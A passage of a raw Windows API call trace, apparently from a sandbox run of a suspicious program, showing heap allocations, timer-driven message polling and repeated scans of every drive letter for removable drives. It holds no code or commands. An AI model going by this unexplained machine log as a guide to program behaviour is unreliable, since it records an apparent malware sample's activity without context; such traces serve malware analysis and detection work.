2 [0217.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0217.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0217.297] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0217.297] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.298] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.298] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0217.298] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.298] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.298] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.298] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.298] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.298] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.298] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0217.298] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.298] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.298] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.298] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.298] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.298] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.298] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.298] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.299] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.299] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.299] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.299] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.300] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.300] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.300] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.300] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.300] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.300] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.301] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.301] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.301] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.301] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.301] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.302] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.302] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.302] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.302] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.302] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.303] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.303] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.303] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.303] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.304] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.304] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.304] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.304] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.304] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.305] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.305] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.305] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.306] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.306] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.306] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.306] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.306] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.306] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.306] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0217.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0217.307] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0217.307] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.307] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.308] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.308] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.308] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0217.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0217.308] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0217.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0217.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0217.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.309] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.309] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.310] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.310] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.310] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.311] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.311] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.311] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.311] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.312] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.312] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.312] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.312] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.312] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.313] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.313] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.313] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.313] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.313] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.314] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.314] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.314] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.314] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.315] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.315] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.315] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.315] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0217.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.316] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.318] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.318] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.318] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.318] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.319] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0217.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0217.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0217.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.319] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0217.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0217.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0217.319] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0217.319] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0217.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.320] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.320] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0217.320] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0217.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.321] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0217.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0217.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.321] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.321] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.322] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.322] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.322] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.322] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.322] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.323] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.323] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.323] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.325] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.326] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.326] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.326] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.326] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.327] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.327] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.327] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.327] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.327] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.328] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.328] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.328] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.329] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.329] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.329] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.329] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.330] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.330] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.330] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.330] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.330] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0217.330] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.330] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.330] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.330] RtlAllocateHeap 